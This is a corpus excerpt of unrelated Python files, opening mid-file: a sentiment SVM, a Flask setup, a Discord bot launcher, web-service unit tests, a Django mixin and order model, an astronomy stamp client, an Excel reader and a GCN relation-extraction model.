punctuation)\n\n\n# print(stop_words)\n# print(punctuation)\n# print(table)\n\n\ndef textclean(text):\n tokens = word_tokenize(text)\n # print(tokens)\n tokens = [word for word in tokens if word.isalpha()]\n # print(tokens)\n tokens = [w.translate(table) for w in tokens]\n # print(tokens)\n tokens = [word for word in tokens if word not in stop_words]\n # print(tokens)\n tokens = [word for word in tokens if len(word) > 1]\n return tokens\n\n\nsentence = \"Line that shows when sentence is converted to list of words. Isn't it cool\"\n# print(textclean(sentence))\n\n\nsentiment_dictionary = {0: 'negative', 2: 'neutral', 4: 'positive'}\n\ndf = pd.read_excel('dataset3.xlsx').reset_index(drop=True).iloc[:1000]\n\ndf = df[[0, 5]]\ndf.columns = ['label', 'tweet']\nprint(df.head())\n\nX_train, X_test, y_train, y_test = train_test_split(df[['tweet']], df[['label']])\n\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\ntweets = []\nfor i in range(len(X_train)):\n words = X_train.iloc[i]['tweet']\n sentiment = y_train.iloc[i]['label']\n words_filtered = [e.lower() for e in words.split() if len(e) >= 3]\n tweets.append((words_filtered, sentiment_dictionary[sentiment]))\n\nfor current_tweet, sentiment in tweets[:5]:\n print(current_tweet, sentiment)\n\n\ndef get_words_in_tweets(tweets):\n all_words = []\n for (words, sentiment) in tweets:\n all_words.extend(words)\n return all_words\n\n\ndef get_word_features(wordlist):\n wordlist = nltk.FreqDist(wordlist)\n word_features = wordlist.keys()\n return word_features\n\n\nword_features = get_word_features(get_words_in_tweets(tweets))\n\n\ndef extract_features(document):\n document_words = set(document)\n features = {}\n for word in word_features:\n features['contains(%s)' % word] = (word in document_words)\n return features\n\n\ntraining_set = nltk.classify.apply_features(extract_features, tweets)\n\na = time.time()\nclassifier = nltk.classify.SklearnClassifier(SVC(kernel='linear'))\nclassifier.train(training_set)\n\nprint(time.time() - a)\n\na = time.time()\npredicted = classifier.classify_many([extract_features(tweet.split()) for tweet in X_test['tweet']])\n\ny_pred = []\nfor fr in predicted:\n if fr == 'negative':\n y_pred.append(0)\n else:\n y_pred.append(4)\n\ny_true = list(y_test.values)\nprint(accuracy_score(y_true, y_pred))\nprint(time.time() - a)\n","sub_path":"final_SVM.py","file_name":"final_SVM.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"306738599","text":"from flask import Flask, url_for\nfrom flask.ext.login import LoginManager\nimport os\n\napp = Flask(__name__, static_folder='static')\napp.config.update(\n\tDEBUG = True,\n\tSQLALCHEMY_DATABASE_URI = 'sqlite:///database.db',\n\tSECRET_KEY = 'something secret'\n)\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.login_view = 'index_view'\nlogin_manager.init_app(app)\n\nfrom app import routes","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"18196800","text":"#!/usr/bin/env python3\nimport sys\nDEBUG = len(sys.argv) > 1\n\nimport random\n# 64 bits of randomness\nCUR = random.randrange(2**(8*64)).to_bytes(64,'little')\n\ndouble_stopper = \"DzvBotMain.pid\"\n\nimport os\ndef chdir():\n d = os.path.split(__file__)[0]\n if d: os.chdir(d)\nchdir()\nprint(\"Current 
Directory Set To:\",os.getcwd())\nif not os.path.exists(double_stopper): \n with open(double_stopper, \"wb\") as f: f.write(CUR)\n\nimport mmap\nmmapfile = open(double_stopper, \"r+b\")\nMM = mmap.mmap(mmapfile.fileno(), 0)\nMM[:64] = CUR\n# if the MM doesnt equal CUR anymore that means someone else started running\n\ndef checkConstants(cfile=\"constants.py\"):\n if os.path.exists(cfile): return\n print(\"Go to https://discordapp.com/developers/applications/me and get the ClientID and Token\")\n ClientID = input(\"ClientID: \")\n Token = input(\"Token: \")\n with open(cfile,\"w\") as f: f.write(\"ClientID = '%s'\\nToken = '%s'\"%(ClientID,Token))\ncheckConstants()\n\nfrom constants import ClientID,Token\n\nimport discord\nimport asyncio\nimport commands\n\n__doc__ = '''https://discordapp.com/oauth2/authorize?&client_id=%s&scope=bot&permissions=11328'''%ClientID\n\nclient = discord.Client()\n@client.event\nasync def on_message(message):\n if MM[:64] != CUR:\n await client.logout()\n return\n\n if message.author.bot or message.author == client.user: return\n\n if DEBUG:\n global M\n M = message\n\n # If I was mentioned you want me to do something\n if (client.user.mentioned_in(message) and client.user in message.mentions) or message.channel.is_private:\n if DEBUG: print(message.clean_content)\n await commands.command(client,message)\n else: # If not mentioned I might react c;\n await commands.react(client,message)\n sys.stdout.flush()\n\nfrom threading import Thread\n# I dont run it directly cause I don't trust it to die on SIGTERM\nt = Thread(target = lambda: client.run(Token), daemon=True)\nt.start()\nsys.stdout.flush()\nif DEBUG:\n print(__doc__)\n from discord.utils import find # when you have a list of stuff to look through use find to find stuff for you\n RUN = client.loop.create_task # A lot of coroutines cant be run directly. 
Use this to run them\nelse:\n t.join()\n if MM[:64] == CUR: # if ended of own volition (aka error killed the thread)\n MM[:] = b\"\\x00\"*len(MM[:])\nmmapfile.close()","sub_path":"DzvBotMain.py","file_name":"DzvBotMain.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"438151469","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@version: $\n@author: zhuzhenping\n@contact: zhuzhenping@hikvision.com\n@site: \n@software: PyCharm\n@file name: updateFields.py\n@created time: 2017/3/27 20:01\nDescription:对已有的某条数据进行更改,实现纠正错误的功能\n\"\"\"\n\nimport unittest\nfrom TestCaseWorkspace.common import tools\nimport random\nimport json\nimport time\n\nrequestUrl = tools.getConfYaml(\"url\",\"url_8580\")\n\n\ncss = tools.bcolors\n\ndateELASTIC = {\n \"rowKey\" : \"\",\n}\n\ndateELASTIC_old = {\n \"rowKey\" : \"\",\n}\n\ndateELASTIC_1 = {\n\n}\n\nrequestDateJson ={\n 'ws:updateFields': { # 是否必填\n 'fieldJson' : \"\" # Y\t纠错参数,格式为json\n }\n}\n\n\n#Description:对已有的某条数据进行更改,实现纠正错误的功能\nclass updateFields(unittest.TestCase):\n\n def setUp(self):\n pass\n\n #fieldJson为空时,非法值时\n def test_001(self):\n #{\"rowKey\":\"20150380800101_dc71bdf7cffc4690a328f03faa62220c\",\"brand\":3}\n #requestDateJson[\"ws:updateFields\"][\"fieldJson\"] = (dateELASTIC)\n for requestJson in [\"\",\"[]\",\"{}\",0,\"-1\"]:\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]=requestJson\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #判断状态查询状态\n self.assertEquals(resp[\"ret\"],\"-1\")\n\n #fieldJson字段仅包含rowKey时\n def test_002(self):\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]='{\"rowKey\":\"20150380800101_dc71bdf7cffc4690a328f03faa62220c\"}'\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #判断状态查询状态\n self.assertEquals(resp[\"ret\"],\"-1\")\n self.assertEquals(resp[\"msg\"],\"0\")\n\n #fieldJson字段不包含纠错字段(只有纠错字段,或者包含时间戳字段时)\n def test_003(self):\n for requestJson in ['{\"brand\":3}','{\"timestamp_\":\"1475924635925\",}','{\"timestamp_\":\"1475924635925\",\"brand\":3}','{\"timestamp_\":\"1475924635925\",\"brand\":3,\"things\":7}']:\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]=requestJson\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #判断状态查询状态\n self.assertEquals(resp[\"ret\"],\"-1\")\n self.assertEquals(resp[\"msg\"],\"查询失败\")\n\n\n #@@@失败项原因:纠错功能接口中传入修改的参数值,通过UDE反查发现修改未生效\n #随机选取UDE中某一数据,更新部分字段。重新读取判断更新是否成功\n def test_004(self):\n #获取随机选择2016100600-2016101300时间段内某一数据,获取其rowkey值\n resp = tools.requests_Getapi(\"http://hdh8:9200/hik_smart_metadata-2016100600-2016101300/_search\",\"get\")\n if len(resp[\"hits\"][\"hits\"])>0:\n dateELASTIC_old[\"rowKey\"] = resp[\"hits\"][\"hits\"][random.randint(0,9)][\"_source\"][\"rowKey\"]\n #通过rowkey值反查数据属性及其对应参数值\n resp = tools.requests_Posttext(\"http://hdh8:4848/SqlServlet\",'sql=select * from HIK_SMART_METADATA where rowKey=\"{0}\"'.format(dateELASTIC_old[\"rowKey\"]))\n resp = json.loads(resp)\n #将查询到的数据保存至dateELASTIC_old (固定五个属性值)\n dateELASTIC_old[resp[\"result\"][\"fields\"][4]] = resp[\"result\"][\"rows\"][0][\"row\"][4] #plate\n dateELASTIC_old[resp[\"result\"][\"fields\"][9]] = resp[\"result\"][\"rows\"][0][\"row\"][9] #bag\n dateELASTIC_old[resp[\"result\"][\"fields\"][27]] = 2 #brand\n 
dateELASTIC_old[resp[\"result\"][\"fields\"][32]] = resp[\"result\"][\"rows\"][0][\"row\"][32] #hat\n dateELASTIC_old[resp[\"result\"][\"fields\"][59]] = resp[\"result\"][\"rows\"][0][\"row\"][59] #glass\n #print(\"dateELASTIC_old:\",dateELASTIC_old)\n #修改数据属性值,并保存在dateELASTIC中\n dateELASTIC[\"plate\"] = dateELASTIC_old[\"plate\"]+\"1\"\n dateELASTIC[\"bag\"] = dateELASTIC_old[\"bag\"]+\"1\"\n dateELASTIC[\"brand\"] = dateELASTIC_old[\"brand\"]+1\n dateELASTIC[\"hat\"] = dateELASTIC_old[\"hat\"]+\"1\"\n dateELASTIC[\"glass\"] = dateELASTIC_old[\"glass\"]+\"1\"\n dateELASTIC[\"rowKey\"] = dateELASTIC_old[\"rowKey\"]\n\n dateELASTIC_new = json.dumps(dateELASTIC)\n #print(\"dateELASTIC_new:\",dateELASTIC_new)\n #使用接口更新数据\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]=dateELASTIC_new\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #根据接口返回结果判断状态\n self.assertEquals(resp[\"ret\"],\"0\")\n self.assertEquals(resp[\"msg\"],\"更新成功\")\n self.assertEquals(resp[\"data\"],\"更新成功\")\n #二次查询数据属性值\n resp = tools.requests_Posttext(\"http://hdh8:4848/SqlServlet\",'sql=select * from HIK_SMART_METADATA where rowKey=\"{0}\"'.format(dateELASTIC_old[\"rowKey\"]))\n resp = json.loads(resp)\n #将获取到的数据属性值,重新保存在dateELASTIC中\n dateELASTIC_1[resp[\"result\"][\"fields\"][4]] = resp[\"result\"][\"rows\"][0][\"row\"][4] #plate\n dateELASTIC_1[resp[\"result\"][\"fields\"][9]] = resp[\"result\"][\"rows\"][0][\"row\"][9] #bag\n dateELASTIC_1[resp[\"result\"][\"fields\"][27]] = 2 #brand\n dateELASTIC_1[resp[\"result\"][\"fields\"][32]] = resp[\"result\"][\"rows\"][0][\"row\"][32] #hat\n dateELASTIC_1[resp[\"result\"][\"fields\"][59]] = resp[\"result\"][\"rows\"][0][\"row\"][59] #glass\n #将二次获取属性值与老数据进行对比\n #print(\"dateELASTIC_1\",dateELASTIC_1)\n for i in [\"plate\",\"bag\",\"brand\",\"hat\",\"glass\"]:\n self.assertNotEqual(str(dateELASTIC[i])==str(dateELASTIC_new[i]))\n\n\nif __name__ == '__main__':\n unittest.main() ","sub_path":"TestCaseWorkspace/Datafile_Case/VSP_/Version_1.0.2/IHSRNetWebService8580/updateFields.py","file_name":"updateFields.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"221442162","text":"# This is a demo to read a file\n\nfilename = \"text.txt\"\n\nwith open(filename) as file:\n content = file.readlines()\n print(content)\n\ndestination = \"summer holiday at beach\"\nmySlice = destination[0:6]\nprint(mySlice)\n\nimport time\n\ntimenow = time.localtime(time.time())\n# print(timenow)\n\ntimeIs = time.asctime()\nprint(timeIs)\n\ntimeIs = time.ctime()\nprint(timeIs)\n\ntry:\n open(\"tet.txt\")\nexcept:\n print(\"File not found\")\n","sub_path":"LanguageBasics/readingFiles.py","file_name":"readingFiles.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"500810124","text":"import ray\nimport argparse\n\nfrom env.inventory_env import InventoryManageEnv\nfrom env.inventory_utils import Utils\nfrom scheduler.inventory_random_policy import ProducerBaselinePolicy, BaselinePolicy\n\nfrom scheduler.inventory_eoq_policy import ConsumerEOQPolicy as ConsumerBaselinePolicy\n\nfrom config.inventory_config import env_config\nfrom utility.visualization import visualization\n\n\nfrom scheduler.inventory_dqn_baseline import ConsumerDQNTorchPolicy\nfrom scheduler.Trainer import Trainer\nimport numpy as np\nimport os\nfrom 
utility.tensorboard import TensorBoard\nfrom scheduler.forecasting_model import Forecasting_model\n\n# Configuration ===============================================================================\n\nforecast_mode_config_default = {\n \"hist_len\": 21,\n \"fore_len\": 3,\n \"batch_size\": 128,\n \"training_steps\": 10000,\n \"evaluation_steps\": 200,\n \"train_round\": 50,\n\n}\n\ndef train_forecasting_model(args):\n if not os.path.exists('train_log'):\n os.mkdir('train_log')\n writer = TensorBoard(f'train_log/{args.run_name}')\n print(\" == start training forecasting model ==\")\n forecast_config = forecast_mode_config_default.copy()\n forecast_model = Forecasting_model(forecast_config)\n for i in range(forecast_config['train_round']):\n eval_loss = forecast_model.eval_one_round(forecast_config['evaluation_steps'])\n train_loss = forecast_model.train_one_round(forecast_config['training_steps'])\n\n print(f\"round {i}\")\n print(f\"train_loss: max: {np.max(train_loss):13.6f} mean: {np.mean(train_loss):13.6f} min: {np.min(train_loss):13.6f}\")\n print(f\"eval_loss: max: {np.max(eval_loss):13.6f} mean: {np.mean(eval_loss):13.6f} min: {np.min(eval_loss):13.6f}\")\n writer.add_scalar('ztrain/train_loss', np.mean(train_loss), i)\n writer.add_scalar('ztrain/eval_loss', np.mean(eval_loss), i)\n forecast_model.eval_all(f'train_log/{args.run_name}')\n return forecast_model\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--torch\", action=\"store_true\")\nparser.add_argument(\"--batch-size\", type=int, default=2048)\nparser.add_argument(\"--use-prev-action-reward\", action=\"store_true\")\nparser.add_argument(\"--num-iterations\", type=int, default=1000)\nparser.add_argument(\"--visualization-frequency\", type=int, default=100)\nparser.add_argument(\"--run-name\", type=str, default='1223_forecasting_hid32_sigmoid_2layer_train_more')\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n train_forecasting_model(args)\n\n","sub_path":"RLPolicy/inventory_train_forecasting.py","file_name":"inventory_train_forecasting.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"213875225","text":"from braces.views import LoginRequiredMixin\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import (\n get_object_or_404,\n redirect\n)\n\nfrom contacts.models import (\n Book,\n BookOwner,\n)\n\n\nclass BookOwnerMixin(LoginRequiredMixin):\n\n def get_queryset(self):\n if self.kwargs.get('book'):\n try:\n bookowner = BookOwner.objects.get(\n user=self.request.user,\n book_id=self.kwargs.get('book'),\n )\n return self.model.objects.for_user(\n self.request.user, book=bookowner.book,\n )\n except BookOwner.DoesNotExist:\n pass\n return self.model.objects.for_user(self.request.user)\n\n def get_object(self, queryset=None):\n instance = super(BookOwnerMixin, self).get_object(queryset)\n\n if not instance.can_be_viewed_by(self.request.user):\n raise PermissionDenied\n\n return instance\n\n def form_valid(self, form):\n form.instance.book = BookOwner.objects.get(\n user=self.request.user\n ).book\n response = super(BookOwnerMixin, self).form_valid(form)\n\n return response\n","sub_path":"contacts/views/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"153648641","text":"import warnings\nimport gzip\nimport io\nfrom .utils import Client\nfrom 
astropy.io.fits import HDUList\nfrom astropy.io.fits import open as fits_open\nfrom urllib.error import HTTPError\nfrom alerce.search import AlerceSearch\nfrom alerce.exceptions import CandidError\n\n\nclass AlerceStamps(Client):\n search_client = AlerceSearch()\n\n def __init__(self, **kwargs):\n default_config = {\n \"AVRO_URL\": \"https://avro.alerce.online\",\n \"AVRO_ROUTES\": {\"get_stamp\": \"/get_stamp\", \"get_avro\": \"/get_avro\"},\n }\n default_config.update(kwargs)\n super().__init__(**default_config)\n\n def _in_ipynb(self):\n try:\n from IPython import get_ipython\n import os\n\n if \"IPKernelApp\" not in get_ipython().config: # pragma: no cover\n raise ImportError(\"console\")\n return False\n if \"VSCODE_PID\" in os.environ: # pragma: no cover\n raise ImportError(\"vscode\")\n return False\n except Exception as e:\n return False\n else: # pragma: no cover\n return True\n\n def _get_first_detection(self, oid):\n detections = self.search_client.query_detections(oid, format=\"pandas\")\n first_detection = detections[detections.has_stamp].candid.astype(\"int64\").min()\n try:\n first_detection = int(first_detection)\n except TypeError:\n raise CandidError()\n return first_detection\n\n def plot_stamps(self, oid, candid=None):\n \"\"\"\n Plot stamp in a notebook given oid. It uses IPython HTML.\n\n Parameters\n ----------\n oid : :py:class:`str`\n object ID in ALeRCE DBs.\n candid : :py:class:`int`\n Candid of the stamp to be displayed.\n\n Returns\n -------\n Display the stamps on a jupyter notebook.\n \"\"\"\n if not self._in_ipynb():\n warnings.warn(\"This method only works on Notebooks\", RuntimeWarning)\n return\n\n if candid is None:\n candid = self._get_first_detection(oid)\n\n # display is used below, so it must be imported alongside HTML\n from IPython.display import HTML, display\n\n science = \"%s?oid=%s&candid=%s&type=science&format=png\" % (\n self.config[\"AVRO_URL\"] + self.config[\"AVRO_ROUTES\"][\"get_stamp\"],\n oid,\n candid,\n )\n template = science.replace(\"science\", \"template\")\n difference = science.replace(\"science\", \"difference\")\n images = \"\"\"\n
 <div align=\"center\">ZTF oid: %s, candid: %s</div>\n <div align=\"center\">\n Science&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Template&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Difference\n </div>\n <div align=\"center\">\n <img src=\"%s\"/>\n <img src=\"%s\"/>\n <img src=\"%s\"/>\n </div>
\n \"\"\" % (\n oid,\n candid,\n science,\n template,\n difference,\n )\n display(HTML(images))\n\n def get_stamps(self, oid, candid=None, format=\"HDUList\"):\n \"\"\"Download Stamps for an specific alert.\n\n Parameters\n ----------\n oid : :py:class:`str`\n object ID in ALeRCE DBs.\n candid : :py:class:`int`\n Candid of the stamp to be displayed.\n format : :py:class: `str`\n Output format [HDUList|numpy]\n\n Returns\n -------\n Science, Template and Difference stamps for an specific alert.\n \"\"\"\n if candid is None:\n candid = self._get_first_detection(oid)\n try:\n stamp_types = [\"science\", \"template\", \"difference\"]\n stamp_list = []\n for stamp_type in stamp_types:\n url = \"%s?oid=%s&candid=%s&type=%s&format=fits\" % (\n self.config[\"AVRO_URL\"] + self.config[\"AVRO_ROUTES\"][\"get_stamp\"],\n oid,\n candid,\n stamp_type,\n )\n\n http_response = self.session.request(\"GET\", url)\n\n with gzip.open(io.BytesIO(http_response.content), \"rb\") as f:\n tmp_hdulist = fits_open(\n io.BytesIO(f.read()), ignore_missing_simple=True\n )\n\n stamp_list.append(tmp_hdulist[0])\n\n if format == \"HDUList\":\n hdulist = HDUList()\n for stamp, stamp_type in zip(stamp_list, stamp_types):\n stamp.header[\"STAMP_TYPE\"] = stamp_type\n hdulist.append(stamp)\n return hdulist\n elif format == \"numpy\":\n return [stamp.data.copy() for stamp in stamp_list]\n except HTTPError:\n warnings.warn(\"AVRO File not found.\", RuntimeWarning)\n return None\n\n def get_avro(self, oid, candid=None):\n \"\"\"Download avro of some alert.\n\n Parameters\n ----------\n oid : :py:class:`str`\n object ID in ALeRCE DBs.\n candid : :py:class:`int`\n Candid of the avro to be downloaded.\n\n Returns\n -------\n Avro of a given alert.\n \"\"\"\n if candid is None:\n candid = self._get_first_detection(oid)\n try:\n url = self.config[\"AVRO_URL\"] + self.config[\"AVRO_ROUTES\"][\"get_avro\"]\n params = {\"oid\": oid, \"candid\": candid}\n http_response = self.session.request(\"GET\", url, params=params)\n return http_response.content\n except HTTPError:\n warnings.warn(\"AVRO File not found.\", RuntimeWarning)\n return None\n","sub_path":"alerce/stamps.py","file_name":"stamps.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"384683446","text":"from django.conf import settings\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\nimport datetime\n\nfrom django.db.models.signals import pre_save\n\nfrom localomddata.models.commonFields import CommonFields\nfrom localomddata.models.product import Product\nfrom localomddata.models.slot import Slot\n\n\nclass OrderMainManager(models.Manager):\n def submitted(self, *args, **kwargs):\n return super(OrderMainManager, self).filter(status='0')\n def finished(self):\n return super(OrderMainManager, self).filter(status='2')\n def byOrderNo(self, *args):\n return super(OrderMainManager, self).filter(orderNo=args[0])\n\n\n\npredicateDict = {\n \"OrderMain.slot\": \"orders\", \"OrderMain.user\": \"orders\"\n}\nPayType = {\n (\"0\", \"现金\"), (\"1\", \"会员\"),(\"3\",\"微信\"),(\"4\", \"支付宝\")\n}\nStatus = {\n (\"0\", \"已提交\"), (\"1\", \"已支付\"),(\"2\", \"已完成\")\n}\n\n\ndef createOrderNo(instance):\n thisday = datetime.date.today();\n orderPrefix = '{:02d}'.format(thisday.month)+'{:02d}'.format(thisday.day)\n qs = OrderMain.objects.filter(orderNo__startswith=orderPrefix).order_by(\"-orderNo\")\n if qs.exists():\n orderNo = \"%s\" % 
(int(qs.first().orderNo) + 1)\n else:\n orderNo = orderPrefix + '0000'\n return orderNo\n\nclass OrderMain(CommonFields):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name=predicateDict[\"OrderMain.user\"], default=1, verbose_name = \"创建人\")\n slot = models.ForeignKey(Slot, related_name=\"orders\", on_delete=models.SET_NULL, blank=True, null=True, verbose_name = \"货道\")\n product = models.ForeignKey(Product, related_name=\"orders\", on_delete=models.SET_NULL, blank=True, null=True, verbose_name = \"商品\")\n itemCount = models.PositiveSmallIntegerField(default=1, validators=[MaxValueValidator(64), MinValueValidator(1)])\n orderNo = models.CharField(\"订单号\", max_length=8, default=createOrderNo)\n payType = models.CharField(\"支付类型\", max_length=1, choices=PayType, default=\"0\")\n status = models.CharField(\"订单状态\", max_length=1, choices=Status, default = '0')\n totalPaid = models.DecimalField(\"支付金额\", max_digits=3, decimal_places=0)\n class Meta:\n verbose_name = verbose_name_plural = \"09. 订单查看\"\n def __str__(self):\n return self.orderNo\n\n\n\ndef createTotalPaid(instance):\n product = Product.objects.get(pk=instance.product.id)\n return product.saleUnitPrice * instance.itemCount;\n\ndef pre_save_vm_receiver(sender, instance, *args, **kwargs):\n if not instance.orderNo:\n instance.orderNo = createOrderNo(instance)\n if not instance.totalPaid:\n instance.totalPaid = createTotalPaid(instance)\n\n\npre_save.connect(pre_save_vm_receiver, sender=OrderMain)","sub_path":"django/localomd/localomddata/models/ordermain.py","file_name":"ordermain.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"598894978","text":"from openpyxl import load_workbook\nfrom singleton import Singleton\n\nclass handleExcelData(Singleton):\n def __init__(self, excel_path, name=None):\n self.execl_path = excel_path\n self.name = name\n wb = load_workbook(self.execl_path)\n if self.name is None:\n self.ws = wb.active\n\n else:\n self.ws = wb[self.name]\n self.head_date_tuple = tuple(self.ws.iter_rows(max_row=1, values_only=True))[0]\n # self.head_date_tuple=[i.value for i in self.ws[1]]\n\n def getExcelData(self):\n\n one_list = []\n for one_tuple in tuple(self.ws.iter_rows(min_row=2, values_only=True)):\n one_list.append(dict(zip(self.head_date_tuple, one_tuple)))\n return one_list\n # rows=list(self.ws.rows)\n # datas=[]\n # for row in rows[1:]:\n # data=[]\n # for cell in row:\n # data.append(cell.value)\n # data_dict=dict(zip(self.head_date_tuple,data))\n # datas.append(data_dict)\n # return datas\n\n\n def write_data(self, row, request):\n if isinstance(row, int) and (2 <= row <= self.ws.max_row):\n self.ws.cell(row, column=self.head_date_tuple.index(\"request\") + 1, value=request)\n self.ws.save(self.execl_path)\n\n\nif __name__ == '__main__':\n do_excelData = handleExcelData(excel_path=\"D:\\demo\\新建 XLSX 工作表.xlsx\")\n do_excelData.getExcelData()\n","sub_path":"webDemo/common/handleExecl.py","file_name":"handleExecl.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"245888755","text":"\"\"\"\nGCN model for relation extraction.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\n\nfrom model.layers import GCN, pool\nfrom model.tree import Tree, head_to_tree, tree_to_adj\nfrom utils import constant, torch_utils\n\nclass 
GCNClassifier(nn.Module):\n \"\"\" A wrapper classifier for GCNRelationModel. \"\"\"\n def __init__(self, opt, emb_matrix=None):\n super().__init__()\n self.gcn_model = GCNRelationModel(opt, emb_matrix=emb_matrix)\n in_dim = opt['hidden_dim']\n self.classifier = nn.Linear(in_dim, opt['num_class'])\n self.opt = opt\n\n def conv_l2(self):\n return self.gcn_model.gcn.conv_l2()\n\n def forward(self, inputs):\n outputs, pooling_output = self.gcn_model(inputs)\n logits = self.classifier(outputs)\n return logits, pooling_output\n\nclass GCNRelationModel(nn.Module):\n def __init__(self, opt, emb_matrix=None):\n super(GCNRelationModel, self).__init__()\n self.opt = opt\n self.emb_matrix = emb_matrix\n\n # create embedding layers\n self.emb = nn.Embedding(opt['vocab_size'], opt['emb_dim'], padding_idx=constant.PAD_ID)\n self.pos_emb = nn.Embedding(len(constant.POS_TO_ID), opt['pos_dim']) if opt['pos_dim'] > 0 else None\n self.ner_emb = nn.Embedding(len(constant.NER_TO_ID), opt['ner_dim']) if opt['ner_dim'] > 0 else None\n\n embeddings = (self.emb, self.pos_emb, self.ner_emb)\n self.init_embeddings()\n\n self.gcn = GCN(opt, embeddings, opt['hidden_dim'], opt['num_layers'])\n\n # output mlp layers\n in_dim = opt['hidden_dim'] * 3\n\n layers = [nn.Linear(in_dim, opt['hidden_dim']), nn.ReLU()]\n for _ in range(self.opt['mlp_layers'] - 1):\n layers += [nn.Linear(opt['hidden_dim'], opt['hidden_dim']), nn.ReLU()]\n self.out_mlp = nn.Sequential(*layers)\n \n def init_embeddings(self):\n if self.emb_matrix is None:\n self.emb.weight.data[1:, :].uniform_(-1.0, 1.0)\n else:\n self.emb_matrix = torch.from_numpy(self.emb_matrix)\n self.emb.weight.data.copy_(self.emb_matrix)\n # decide finetuning\n if self.opt['topn'] <= 0:\n print(\"Do not finetune word embedding layer.\")\n self.emb.weight.requires_grad = False\n elif self.opt['topn'] < self.opt['vocab_size']:\n print(\"Finetune top {} word embeddings.\".format(self.opt['topn']))\n self.emb.weight.register_hook(lambda x: \\\n torch_utils.keep_partial_grad(x, self.opt['topn']))\n else:\n print(\"Finetune all embeddings.\")\n \n def forward(self, inputs):\n words, masks, pos, ner, deprel, head, subj_pos, obj_pos, subj_type, obj_type = inputs # unpack\n seq_length = (masks.data.cpu().numpy() == 0).astype(np.int64).sum(1)\n maxlen = max(seq_length)\n\n def inputs_to_tree_reps(head, words, l, prune, subj_pos, obj_pos):\n head, words, subj_pos, obj_pos = head.cpu().numpy(), words.cpu().numpy(), subj_pos.cpu().numpy(), obj_pos.cpu().numpy()\n trees = [head_to_tree(head[i], words[i], l[i], prune, subj_pos[i], obj_pos[i]) for i in range(len(l))]\n adj = [tree_to_adj(maxlen, tree, directed=False, self_loop=False).reshape(1, maxlen, maxlen) for tree in trees]\n adj = np.concatenate(adj, axis=0)\n adj = torch.from_numpy(adj)\n return Variable(adj.cuda()) if self.opt['cuda'] else Variable(adj)\n \n adj = inputs_to_tree_reps(head.data, words.data, seq_length, self.opt['prune_k'], subj_pos.data, obj_pos.data)\n h, pool_mask = self.gcn(adj, inputs)\n\n # pooling\n subj_mask, obj_mask = subj_pos.eq(0).eq(0).unsqueeze(2), obj_pos.eq(0).eq(0).unsqueeze(2) # invert mask\n pool_type = self.opt['pooling']\n h_out = pool(h, pool_mask, type=pool_type)\n subj_out = pool(h, subj_mask, type=pool_type)\n obj_out = pool(h, obj_mask, type=pool_type)\n outputs = torch.cat([h_out, subj_out, obj_out], dim=1)\n outputs = self.out_mlp(outputs)\n return outputs, h_out\n","sub_path":"model/cgcn.py","file_name":"cgcn.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
